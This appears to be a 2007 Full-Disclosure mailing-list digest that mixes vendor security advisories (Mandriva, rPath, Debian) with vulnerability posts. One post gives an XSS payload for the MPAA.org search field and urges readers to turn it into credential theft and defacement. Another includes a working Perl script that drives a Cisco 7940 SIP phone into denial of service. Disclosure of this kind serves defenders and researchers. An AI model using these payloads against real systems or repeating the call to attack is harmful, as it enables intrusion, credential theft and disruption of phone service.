 ac6a1a0ee09b5ee6e9f496d758e7f4c7  2008.0/SRPMS/openssl-0.9.8e-8.1mdv2008.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHVe8nmqjQ0CJFipgRAs1MAJ9LYX27llzE2HQrBlq/DZWYA3kH3ACfZiRe
XoXb4wUDKbH8xKzaso8r+ao=
=20Gi
-----END PGP SIGNATURE-----



From kristian.hermansen at gmail.com  Wed Dec  5 04:26:02 2007
From: kristian.hermansen at gmail.com (Kristian Erik Hermansen)
Date: Tue, 4 Dec 2007 20:26:02 -0800
Subject: [Full-disclosure] 0day XSS for MPAA.org
Message-ID: <fe37588d0712042026o6a385459t4a1cea0ab86bd540@mail.gmail.com>

As many of you have heard, the MPAA themselves are violating the GNU
GPL.  Such hypocrisy from a company which claims they adhere to
copyrights :-)  In protest, I took exactly 7 seconds to locate an XSS
in their website and am posting it for your perusal.  Maybe someone
can use it in an email to an MPAA staff member, and perhaps can modify
the payload to steal credentials for some MPAA admin interface.  And
perhaps then, after gaining MPAA credentials, this person can modify
the MPAA website.  And perhaps after that, we can all laugh at the
MPAA yet again in their quest to sue 12 year old kids for downloading
MP3 files...

There are many more XSS on their site.  Everyone knows that if you
find one bug on top (without much effort), there are many more
security issues hiding beneath the surface.  I leave it up to the
MPPA-haters out there to dig deeper and use it to "influence" the MPAA
website...

Here's one for the 'txtsearch' search field on the main page at
MPAA.org in the top right-hand corner where it says 'Find the rating
of a film'...
ERR"></tr></table></td><script>alert('xss');</script>
-- 
Kristian Erik Hermansen
"I have no special talent. I am only passionately curious."



From announce-noreply at rpath.com  Tue Dec  4 23:30:21 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Tue, 04 Dec 2007 18:30:21 -0500
Subject: [Full-disclosure] rPSA-2007-0257-1 rsync
Message-ID: <4755e30d.n5hyFZbLmggamMzb%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0257-1
Published: 2007-12-04
Products:
    rPath Linux 1

Rating: Minor
Exposure Level Classification:
    Remote Deterministic Unauthorized Access
Updated Versions:
    rsync=conary.rpath.com at rpl:1/2.6.8-1.2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1989

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6199
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6200

Description:
    Previous versions of the rsync package contain two vulnerabilities
    in the rsync server which can allow users to bypass security
    restrictions under certain specific configurations.  As these
    vulnerabilities are only exposed when running the rsync server,
    default configurations are not vulnerable.

http://wiki.rpath.com/Advisories:rPSA-2007-0257

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From security at xssed.com  Wed Dec  5 06:40:59 2007
From: security at xssed.com (security at xssed.com)
Date: Wed, 5 Dec 2007 07:40:59 +0100 (CET)
Subject: [Full-disclosure] XSS Early Warning Mailing List Now Open
Message-ID: <2301.79.166.27.150.1196836859.squirrel@www.ddosed.com>

Hello there!

The long awaited XSS early warning mailing list is now open for
subscriptions. :)

http://www.xssed.com/earlywarning

Whether you are a government CERT or the individual webmaster, we invite
you to subscribe for FREE to this new cool feature.
The mailing list is moderated by the administrators of XSSed.com.

The ML feature has already proven successful for several high-profiled web
sites and CERTs. They receive instant alerts on newly indexed cross-site
scripting (XSS) vulns affecting their online properties.

For any query regarding the fixation of cross-site scripting
vulnerabilities, do not hesitate to contact us! We will help and advise
you for FREE! :)

Dimitris,
XSSed staff



From a.klink at cynops.de  Wed Dec  5 08:26:18 2007
From: a.klink at cynops.de (Alexander Klink)
Date: Wed, 5 Dec 2007 09:26:18 +0100
Subject: [Full-disclosure] Certificate spoofing issue with Mozilla,
	Konqueror, Safari 2
In-Reply-To: <1195420878.5999.58.camel@tpol.lan>
References: <1195420878.5999.58.camel@tpol.lan>
Message-ID: <20071205.2ea0df8bb8444c6ccf5e2f1d55851708@cynops.de>

Hi,

On Sun, Nov 18, 2007 at 10:21:18PM +0100, Nils Toedtmann wrote:
>         DN="CN=www.example.com"
>         subjectAltName:dNSName=www.example.com
>         subjectAltName:dNSName=www.paypal.com
> 
>     and lures the user to https://www.example.com/. The user gets an
>     "unknown CA" warning, but the "subjectAltName:dNSName" extensions
>     are not shown to him, so the cert looks ok. As he does not plan to
This is particularly annoying as there is no way to actually view the
subjectAltNames in Mozilla (except for being able to translate the
hexdump in your head). At least they're planning to change the handling
of wildcards[0], so it is no longer enough to get that one certificate
with a subjectAltName of '*' installed.

Best regards,
    Alex

[0]: http://permalink.gmane.org/gmane.comp.mozilla.crypto/8429
-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch



From nadtec at hotmail.com  Wed Dec  5 09:21:24 2007
From: nadtec at hotmail.com (happy nino)
Date: Wed, 5 Dec 2007 09:21:24 +0000
Subject: [Full-disclosure] need help in managing administrators
In-Reply-To: <016701c8355b$46222cc0$d2668640$@com>
References: <4751369B.9060307@pirate-radio.org>
	<BAY108-W322BB21B2871F55233261DD6730@phx.gbl>
	<016701c8355b$46222cc0$d2668640$@com>
Message-ID: <BAY108-W657F6E35C43F468FCCBD7D66E0@phx.gbl>

to all who replied to my request, i thank you a lot , you advises where really helpful, i thank you very much


From: joel at helgeson.comTo: nadtec at hotmail.com; bugtraq at securityfocus.com; full-disclosure at lists.grok.org.ukSubject: RE: [Full-disclosure] need help in managing administratorsDate: Sun, 2 Dec 2007 21:19:10 -0600






Launch ?Active Directory Users & Computers?
Listed you have the AD containers used to hold all your objects, select a tree, right-click the container, click properties. There is a tab called ?Delegate Control? where you can delegate management of the objects located in that container to whatever groups or individuals you want.  It is best to create a user group, then delegate the control to the group rather than the user.
This is where it is important that you have your AD containers set up properly?
 
Hope that helps provide some direction?
 
Joel Helgeson
 
 


From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of happy ninoSent: Sunday, December 02, 2007 3:42 AMTo: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.ukSubject: [Full-disclosure] need help in managing administrators
 

 
Hi All,i've a problem in my organization that we have several domain admins, we are in the process of removing most of them but i need to have a person only authorized to installnew software to users' computers but without having access to other parts of the users machines, is this possible ?..can i delegate a function like this only to certain users with outbeing domain admins?Appreciate your great helpthanks alot regards,Nad 
 



Get closer to the jungle. I'm a Celebrity Get Me Out Of Here!
_________________________________________________________________
Telly addicts unite!
http://www.searchgamesbox.com/tvtown.shtml
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/f51b545d/attachment.html 

From State at loria.fr  Wed Dec  5 14:16:01 2007
From: State at loria.fr (Radu State)
Date: Wed, 5 Dec 2007 15:16:01 +0100
Subject: [Full-disclosure] Cisco Phone 7940 remote DOS
Message-ID: <000c01c83749$5d0c3300$5e0c5198@Crocodile>

Cisco 7940 Denial of Service Vulnerability

 

Hardware:

Cisco 7940 SIP Phone

 

Severity:

High ? Denial of Service

 

Software:

Affected version: P0S3-08-7-00

Other Versions: May be

 

Notification:

Vulnerability found: 30 August 2007

Contact Cisco: 31 August 2007

Tracked issue: 11 September 2007

 

Vulnerability Synopsis:

 

Initiating a sequence of SIP INVITE transactions leads the device to a state
where it looks functional but it is not able to receive nor to start calls.
If the sequence of INVITE continues, the device will reboot. In the first
case, the period of time where the device is exposed to a DoS is about 3
minutes, but sending new INVITE transactions, at certain intervals, will
keep the target under DoS.

 

In order to generate the SIP INVITE transactions that lead the device to
such state, the Request-URI of the message should not have a user name (i.e.
"INVITE sip:XXX.XXX.XXX.XXX SIP/2.0"). In order to drive the device to a DoS
state only 6 transactions are required as the traffic displayed below.

 

X ----------------------- INVITE (Call-ID #1) -----------------------> Cisco
7940

X <------------------ 100 Trying (Call-ID #1) --------------------- Cisco
7940

 ....

--------5 New Dialogs like the previous--------

 ....

X ----------------------- INVITE (Call-ID #7) -----------------------> Cisco
7940

X <------------------ 486 Busy (Call-ID #7) --------------------- Cisco 7940

 

-------- DoS for aproximatly 3 minutes ------

 

X <------------------ 486 Busy (Call-ID #1) --------------------- Cisco 7940


X <------------------ 486 Busy (Call-ID #2) --------------------- Cisco 7940


X <------------------ 486 Busy (Call-ID #3) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #4) --------------------- Cisco 7940

X <------------------ 486 Busy (Call-ID #5) --------------------- Cisco 7940


X <------------------ 486 Busy (Call-ID #6) --------------------- Cisco 7940

 

Effect:

If the sequence of INVITE transactions continues, the device reboots.

Otherwise, the device can be permanently put under DoS by sending INVITE
transactions at certain intervals.

In such case the device replies busy to any incoming call and return busy to
any call made by the user.

However, the device maintains its connectivity with its registrar by sending
the REGISTER transaction.

 

Impact:

Knowing the userid and IP address of the target:

A remote user can crash the phone

DoS can performed by sending the packets at regular intervals

 

Proof of Concept:

A perl script stateful-cisco-8.7.pl) is attached to this mail.

 

Command:

perl stateful-cisco-8.7.pl <username> <dst_IP> <SourceIp> <sourceport> Eg.
perl stateful-cisco-8.7.pl 192.168.1.7 7940-1 192.168.1.2 tucu

 

Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.

HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr/

 

 

#!/usr/bin/perl

 

###############################

# Vulnerabily discovered using KiF ~ Kiph

#

# Authors:

# Humberto J. Abdelnur (Ph.D Student)

# Radu State (Ph.D)

# Olivier Festor (Ph.D)

#

# Madynes Team, LORIA - INRIA Lorraine

# HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr

###############################

 

use IO::Socket::INET;

use String::Random;

 

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" 

unless ($ARGV[3]);

 

$targetUser = $ARGV[1];

$targetIP = $ARGV[0];

 

$attackerUser = $ARGV[3];

$attackerIP= $ARGV[2];

 

$socket=new IO::Socket::INET->new(

Proto=>'udp',

PeerPort=>5060,

PeerAddr=>$targetIP,

LocalPort=>5060);

 

$foo = new String::Random;

 

$flag = 0;

@calls;

$threads = 0;

 

while ($flag == 0){

$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";

$cseq = $foo->randregex('\d\d\d\d');

 

$msg = "INVITE sip:$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>\r

Call-ID:$callid\r

CSeq: $cseq INVITE\r

Max-Forwards: 70\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, 

MESSAGE\r

Content-Length: 0\r

\r

";

$socket->send($msg);

 

$socket->recv($text,1024,0);

if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){

push(@calls, $callid);

sleep(1);

}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){

if ($thread == 0){

$thread = scalar(@calls);

}

while (scalar(@calls) ge $thread){

$toTag = $cseq= $callid= $text;

$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/;

$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/;

$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/;

 

$msg = "ACK sip:$targetIP SIP/2.0\r

Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r

From: <sip:$attackerUser\@$attackerIP>;tag=1\r

To: <sip:$targetUser\@$targetIP>$toTag\r

Call-ID:$callid\r

CSeq: $cseq ACK\r

Contact: <sip:$attackerUser\@$attackerIP>\r

Content-Length: 0\r

\r

";

$socket->send($msg);

$i= 0;

while ($i < scalar(@calls)){

if (@calls[$i] eq $callid){

delete @calls[$i];

}else{

$i += 1;

}

}

if (scalar(@calls) ge $thread){

$socket->recv($text,1024,0);

}

}

}

}

 


No virus found in this outgoing message.
Checked by AVG Free Edition. 
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007
19:31
 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071205/46d6806c/attachment.html 

From joey at infodrom.org  Wed Dec  5 15:19:43 2007
From: joey at infodrom.org (Martin Schulze)
Date: Wed,  5 Dec 2007 16:19:43 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1419-1] New OpenOffice.org
	packages fix arbitrary Java code execution
Message-ID: <20071205151943.635201031A@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1419-1                    security at debian.org
http://www.debian.org/security/                             Martin Schulze
December 5th, 2007                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openoffice.org, hsqldb
Vulnerability  : programming error
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2007-4575

A vulnerability has been discovered in HSQLDB, the default database
engine shipped with OpenOffice.org.  This could result in the
execution of arbitrary Java code embedded in a OpenOffice.org database
document with the user's privilege.  This update requires an update of
both openoffice.org and hsqldb.

The old stable distribution (sarge) is not affected by this problem.

For the stable distribution (etch) this problem has been fixed in
version 2.0.4.dfsg.2-7etch4 of OpenOffice.org and in version
1.8.0.7-1etch1 of hsqldb.

For the unstable distribution (sid) this problem has been fixed in
version 2.3.1-1 of OpenOffice.org and in version 1.8.0.9-2 of hsqldb.

For the experimental distribution this problem has been fixed in
version 2.3.1~rc1-1 of OpenOffice.org and in version 1.8.0.9-1 of
hsqldb.

We recommend that you upgrade your OpenOffice.org and hsqldb packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2-7etch4.dsc
      Size/MD5 checksum:     7250 c0c7456adb826a4660ef196e56857e1a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2-7etch4.diff.gz
      Size/MD5 checksum: 76905774 526d19410c8e68e5b502083ba0273ed0
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org_2.0.4.dfsg.2.orig.tar.gz
      Size/MD5 checksum: 232674922 2f1a5d92188639d3634bd6d1b1c29038

    http://security.debian.org/pool/updates/main/h/hsqldb/hsqldb_1.8.0.7-1etch1.dsc
      Size/MD5 checksum:      674 e5de2bc9c738f592280016f45b6e0a62
    http://security.debian.org/pool/updates/main/h/hsqldb/hsqldb_1.8.0.7-1etch1.diff.gz
      Size/MD5 checksum:    11725 73eb16347408015a941c7b1cadfa03ab
    http://security.debian.org/pool/updates/main/h/hsqldb/hsqldb_1.8.0.7.orig.tar.gz
      Size/MD5 checksum:  2051414 316a2dc3b8fef1bee991d16e2cc7341b

  Architecture independent components:

    http://security.debian.org/pool/updates/main/o/openoffice.org/broffice.org_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   460082 588f72e30a23aed6e6d39a702f03cb6c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-common_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 27205088 631950c338bdab6d5faf19bb2c8dcf3d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dev-doc_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  5548668 28928f1dcb395068a4aaea6e10ce9a3e
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-dtd-officedocument1.0_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   251200 b4f9523577015c61a7162d81697461be
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-filter-mobiledev_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   309916 e47c5505bd4e828daf4fb8747e93b39b
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-cs_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11858192 68b5e0dc2956f9e8f4d1345c6d03c387
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-da_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11820014 4ff40c414696ef0d3c36c288ffcab333
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-de_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12648152 2f5a8c5cbe70c83ac24b024f2334ac31
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-dz_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 15040732 708ca942c4b83ef61d226a37fb86a0e3
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-en-gb_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11370746 f074b4b06bdcc13f4eb01eb4f4d2a32a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-en-us_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11313332 4a8d69476b10a0b13e2b8ce3fb205fd1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-en_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   213274 b90074e4cd9ace2fb428f50eedbfa395
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-es_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12046136 6933812227f289ab3a1f229ff5ccf4ec
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-et_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11971088 9b79dc85f1d3241d957b4228fc6976cb
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-fr_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12325558 876781945e508de782f79d2ade279bcb
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-hi-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 13160030 cd7c18c23eb8ec00b7dfc3b3014773aa
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-hu_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12579382 359be10f1cd7adcf91a2151c4733b3e1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-it_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12099864 59d36e9b6bb5f64a915c61c7b4158351
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-ja_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12775692 fc5645a28b8bb8639bf646835af0e555
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-km_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 14426212 d96e09b7d36d2897f186834ab1db275f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-ko_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11949970 226af41b173c8c7ce04355eb73870a58
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-nl_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12317674 7fc67ed6512a59e2da88c7d99beb2915
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-pl_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12278984 d0cbdde93aad4c1e8752c60c7338f796
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-pt-br_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12060290 e16225fb599157ef593463f1ab289f38
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-ru_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 13182092 a0f51dca1efe38d8de3c19448c6658c3
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-sl_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12052108 d396a02cbd4209345ee47101f1b4cec5
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-sv_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 11809178 1bc2ed84c4a1001882a27ad39e842786
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-zh-cn_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12080268 1a852faeb33b3c46d7b51cca44c45d16
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-help-zh-tw_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum: 12198876 2c39106611763f2e45f053e3d1a8c27a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-java-common_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  3006534 c62b4db37e8e733e45a6dd8d39ed43dd
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-af_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   855676 c98b667a2b06e6e1c406ac76012c61d8
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-as-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   911764 e77859be699724941113970dbc581bb9
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-be-by_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   912370 7a47f899d2545c54b983cac84d5eee78
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-bg_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2093062 16135e43db8fa4440261268f8a002730
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-bn_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   852416 532dadfc4ac6b08f57fcc5f828e7934d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-br_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   863714 039e75a15b9ee9786e0e56f9937b2b18
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-bs_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   857882 d7220ecfc6f281970e5e9e1b745c5123
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ca_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   874458 7236caef662606e57579bbd0036fdae7
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-cs_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2047268 1f32e140241317ed92f921816e9b5061
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-cy_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   850988 329e1621096fffd612ac7487c6af7fbf
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-da_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1986022 678bfd2de0eb55c716bad12f3e1a93ea
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-de_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1982538 96eb33fe946f3ed920dbea722b801d32
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-dz_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   957206 596e23122bc1094decf47e4b2b301f1c
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-el_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   958096 da9f9389ca4e7fceba5fb400eeff7ba1
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-en-gb_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2016632 58209a85afd6d71df00b975a98287065
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-en-za_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   809102 086992c49c87431b37a2a7952c5197f5
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-eo_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   854174 19f2e91d1e836e89ca7a679a959c4870
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-es_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1983508 4c154ce3b5934a8e4c4496a032f1b8ef
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-et_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   853524 5d1ec193ec4ac359ef3dcc1067626bea
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-fa_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   877042 47833c5e116aa8c34295e8344012af1f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-fi_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   865656 cb1e7f6e7eab3753199da736d5790827
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-fr_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1969146 ada26172b7d04e6216574e0a86beb159
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ga_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   881232 60ccce188483749269e58b7adaacdbd0
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-gu-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   931928 b807ee515e3929144a81b85da1463495
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-he_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   883846 93cc4640e08d3a958a4992ca5273dec8
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-hi-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   939562 afcdc55d72c9c1cd574bfcce238d2a6f
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-hi_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   213274 099d527de8e48d1c36c1160eab0d0cb2
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-hr_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   866730 0972b20b56b6108ed1c0b1a9afa7b2b4
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-hu_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2076180 77c6bc9e652fda164dca3eb5c8ba39e5
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-in_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   213394 18fb9b0cc4707e0f0d1453936131e002
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-it_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  1977788 b4f28920a599c2e8c5595726c551812a
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ja_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2142588 40d670b2eff356f640a6edd5be8731e0
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ka_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   908024 6b4681a253d638322d65c8ad1e032bab
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-km_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2136658 6880efbca754d5897a580a06e1367874
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ko_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:  2031460 79535568de6e00639400142c6cf7bf8d
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-ku_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   885062 b64896f81d4b88dbf7ce495271d5fc64
    http://security.debian.org/pool/updates/main/o/openoffice.org/openoffice.org-l10n-lo_2.0.4.dfsg.2-7etch4_all.deb
      Size/MD5 checksum:   902766 aba2f816225991b67ce9ae5062847595
